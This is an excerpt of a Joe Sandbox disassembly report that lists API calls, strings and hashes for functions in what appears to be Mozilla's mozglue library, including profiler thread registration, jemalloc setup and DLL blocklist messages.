                                                                  • String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll$3JT/
                                                                  • API String ID: 3889411031-1412327615
                                                                  • Opcode ID: 6f045eee01059440ac7e8723daeea8b23cf2e2f1814c72a20d96a07d36bbce02
                                                                  • Instruction ID: 62f3920b39b73bc5771eb03ff5eca4357bdf37cca40afb47cf589f58443dda3f
                                                                  • Opcode Fuzzy Hash: 6f045eee01059440ac7e8723daeea8b23cf2e2f1814c72a20d96a07d36bbce02
                                                                  • Instruction Fuzzy Hash: 8FE11A70A043009BEB24DF24C885BAEB7F5EF85308F54891DE99597680EF74BD44C7A6
                                                                  APIs
                                                                    • Part of subcall function 6C097090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C09B9F1,?), ref: 6C097107
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C09DCF5), ref: 6C09E92D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EA4F
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EA5C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EA80
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EA8A
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C09DCF5), ref: 6C09EA92
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EB11
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EB1E
                                                                  • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C09EB3C
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EB5B
                                                                    • Part of subcall function 6C095710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C09EB71), ref: 6C0957AB
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EBA4
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C09EBAC
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EBC1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000), ref: 6C09EBCE
                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C09EBE5
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8,00000000), ref: 6C09EC37
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C09EC46
                                                                  • CloseHandle.KERNEL32(?), ref: 6C09EC55
                                                                  • free.MOZGLUE(00000000), ref: 6C09EC5C
                                                                  Strings
                                                                  • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C09EA9B
                                                                  • 3JT/, xrefs: 6C09E8BE
                                                                  • [I %d/%d] profiler_start, xrefs: 6C09EBB4
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                  • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start$3JT/
                                                                  • API String ID: 1341148965-3585140985
                                                                  • Opcode ID: 6dc7a06cb21a102a67a896f61e977e596ade2f04d7ef5039e2cbba1839bc821c
                                                                  • Instruction ID: 438dc0a9d6f47aa3dc33118c1379d7543f70ed56e8f6fdf2a041a52924a6c77e
                                                                  • Opcode Fuzzy Hash: 6dc7a06cb21a102a67a896f61e977e596ade2f04d7ef5039e2cbba1839bc821c
                                                                  • Instruction Fuzzy Hash: 82A1F3717006049FDB109F68C844BAAB7F9FF86319F158129ED2987B91DF70B845CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F70E
                                                                  • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C09F8F9
                                                                    • Part of subcall function 6C066390: GetCurrentThreadId.KERNEL32 ref: 6C0663D0
                                                                    • Part of subcall function 6C066390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0663DF
                                                                    • Part of subcall function 6C066390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C06640E
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F93A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F98A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F990
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F994
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F716
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                    • Part of subcall function 6C05B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C05B5E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F739
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F746
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F793
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C0D385B,00000002,?,?,?,?,?), ref: 6C09F829
                                                                  • free.MOZGLUE(?,?,00000000,?), ref: 6C09F84C
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C09F866
                                                                  • free.MOZGLUE(?), ref: 6C09FA0C
                                                                    • Part of subcall function 6C065E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0655E1), ref: 6C065E8C
                                                                    • Part of subcall function 6C065E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C065E9D
                                                                    • Part of subcall function 6C065E60: GetCurrentThreadId.KERNEL32 ref: 6C065EAB
                                                                    • Part of subcall function 6C065E60: GetCurrentThreadId.KERNEL32 ref: 6C065EB8
                                                                    • Part of subcall function 6C065E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C065ECF
                                                                    • Part of subcall function 6C065E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C065F27
                                                                    • Part of subcall function 6C065E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C065F47
                                                                    • Part of subcall function 6C065E60: GetCurrentProcess.KERNEL32 ref: 6C065F53
                                                                    • Part of subcall function 6C065E60: GetCurrentThread.KERNEL32 ref: 6C065F5C
                                                                    • Part of subcall function 6C065E60: GetCurrentProcess.KERNEL32 ref: 6C065F66
                                                                    • Part of subcall function 6C065E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C065F7E
                                                                  • free.MOZGLUE(?), ref: 6C09F9C5
                                                                  • free.MOZGLUE(?), ref: 6C09F9DA
                                                                  Strings
                                                                  • [D %d/%d] profiler_register_thread(%s), xrefs: 6C09F71F
                                                                  • 3JT/, xrefs: 6C09F6F2
                                                                  • " attempted to re-register as ", xrefs: 6C09F858
                                                                  • [I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C09F9A6
                                                                  • Thread , xrefs: 6C09F789
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
                                                                  • String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s$3JT/
                                                                  • API String ID: 882766088-646497431
                                                                  • Opcode ID: 5a5ab66f09569b9c915f6f7f3e2ad7c76779c8ac64f0b9c969775aeb00c228d6
                                                                  • Instruction ID: 0d51d6b230d382a2895f49b1c0e0c9adfe0fe53ea01e62166238328915f8a613
                                                                  • Opcode Fuzzy Hash: 5a5ab66f09569b9c915f6f7f3e2ad7c76779c8ac64f0b9c969775aeb00c228d6
                                                                  • Instruction Fuzzy Hash: 5E81DF71A043009FDB14DF24C840BAEB7F9AF85308F55856DE8599BB51EB30F949CBA2
                                                                  APIs
                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C064196
                                                                  • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0641F1
                                                                  • VerSetConditionMask.NTDLL ref: 6C064223
                                                                  • VerSetConditionMask.NTDLL ref: 6C06422A
                                                                  • VerSetConditionMask.NTDLL ref: 6C064231
                                                                  • VerSetConditionMask.NTDLL ref: 6C064238
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C064245
                                                                  • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C064263
                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C06427A
                                                                  • FreeLibrary.KERNEL32(?), ref: 6C064299
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0642C4
                                                                  • VerSetConditionMask.NTDLL ref: 6C0642F6
                                                                  • VerSetConditionMask.NTDLL ref: 6C064302
                                                                  • VerSetConditionMask.NTDLL ref: 6C064309
                                                                  • VerSetConditionMask.NTDLL ref: 6C064310
                                                                  • VerSetConditionMask.NTDLL ref: 6C064317
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C064324
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                  • String ID: SetProcessDpiAwareness$Shcore.dll$3JT/
                                                                  • API String ID: 3038791930-3002817017
                                                                  • Opcode ID: 4497da3482d007b5d7d38e183ac3976db84e2aa9e1a9ca6da7159fe6eb97c4c3
                                                                  • Instruction ID: e579f534839a9b10948e2ab54ede7be10dc68c2ad0d2ee5b9b0ecfa1a2189bd3
                                                                  • Opcode Fuzzy Hash: 4497da3482d007b5d7d38e183ac3976db84e2aa9e1a9ca6da7159fe6eb97c4c3
                                                                  • Instruction Fuzzy Hash: 0C51F571A442256BEB109FA6CC58BAEB7FCDF86B14F014918FA0597AC0CF74A940CB91
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EE60
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EE6D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EE92
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C09EEA5
                                                                  • CloseHandle.KERNEL32(?), ref: 6C09EEB4
                                                                  • free.MOZGLUE(00000000), ref: 6C09EEBB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EEC7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09EECF
                                                                    • Part of subcall function 6C09DE60: GetCurrentThreadId.KERNEL32 ref: 6C09DE73
                                                                    • Part of subcall function 6C09DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C064A68), ref: 6C09DE7B
                                                                    • Part of subcall function 6C09DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C064A68), ref: 6C09DEB8
                                                                    • Part of subcall function 6C09DE60: free.MOZGLUE(00000000,?,6C064A68), ref: 6C09DEFE
                                                                    • Part of subcall function 6C09DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C09DF38
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EF1E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EF2B
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EF59
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EFB0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EFBD
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09EFE1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09EFF8
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F000
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F02F
                                                                    • Part of subcall function 6C09F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09F09B
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C09F0AC
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C09F0BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop$3JT/
                                                                  • API String ID: 16519850-4081558766
                                                                  • Opcode ID: db92f111edcda67ca282aaed3630cb91aa261ae72100c3ef1106ea785c3ba82c
                                                                  • Instruction ID: d127845c4d28d85c32df4c529b2a6775af1f945c9a73e298ad4d26593886ff97
                                                                  • Opcode Fuzzy Hash: db92f111edcda67ca282aaed3630cb91aa261ae72100c3ef1106ea785c3ba82c
                                                                  • Instruction Fuzzy Hash: F651D6356043119FDF006B64D8087A977FCFB46329F14851AED2A83B81DF75B844DBA6
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DE804), ref: 6C08D047
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C08D093
                                                                  • __Init_thread_footer.LIBCMT ref: 6C08D0A6
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C0DE810,00000040), ref: 6C08D0D0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C0DE7B8,00001388), ref: 6C08D147
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C0DE744,00001388), ref: 6C08D162
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C0DE784,00001388), ref: 6C08D18D
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C0DE7DC,00001388), ref: 6C08D1B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$3JT/
                                                                  • API String ID: 2957312145-2599086937
                                                                  • Opcode ID: 238cc5ad5f0b950313749afa47f3fc1dcca28eee9026732f26b690866ff6c2f8
                                                                  • Instruction ID: 67008b72dd17a08bf8cabb662a9e8cad50a15dd49bedf79939539058fb034040
                                                                  • Opcode Fuzzy Hash: 238cc5ad5f0b950313749afa47f3fc1dcca28eee9026732f26b690866ff6c2f8
                                                                  • Instruction Fuzzy Hash: F981F370B063129BEF009F68C844B69B7F5EF16704F50862AEE2597B80DF71B945CB91
                                                                  APIs
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C068007
                                                                  • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C06801D
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C06802B
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C06803D
                                                                  • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C06808D
                                                                    • Part of subcall function 6C06CA10: mozalloc_abort.MOZGLUE(?), ref: 6C06CAA2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C06809B
                                                                  • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0680B9
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0680DF
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0680ED
                                                                  • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0680FB
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C06810D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C068133
                                                                  • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C068149
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C068167
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C06817C
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C068199
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                  • String ID: 0>l$3JT/
                                                                  • API String ID: 2721933968-841540620
                                                                  • Opcode ID: 008e5af369614f807e51f630d8d004f47c6f4f156d1459a8227d28b0e6385bc6
                                                                  • Instruction ID: c747dd57e1733095756dc5c4512279ae516cf8d239614e1300055e639e81c4ba
                                                                  • Opcode Fuzzy Hash: 008e5af369614f807e51f630d8d004f47c6f4f156d1459a8227d28b0e6385bc6
                                                                  • Instruction Fuzzy Hash: B05165B1E002145BDF10DFA6DC84BEFB7F9AF49664F140625E915E7741E730A904CBA1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09FADC
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09FAE9
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09FB31
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09FB43
                                                                  • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C09FBF6
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09FC50
                                                                  Strings
                                                                  • 3JT/, xrefs: 6C09FAAF
                                                                  • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6C09FC94
                                                                  • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C09FD15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                  • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered$3JT/
                                                                  • API String ID: 2101194506-707413481
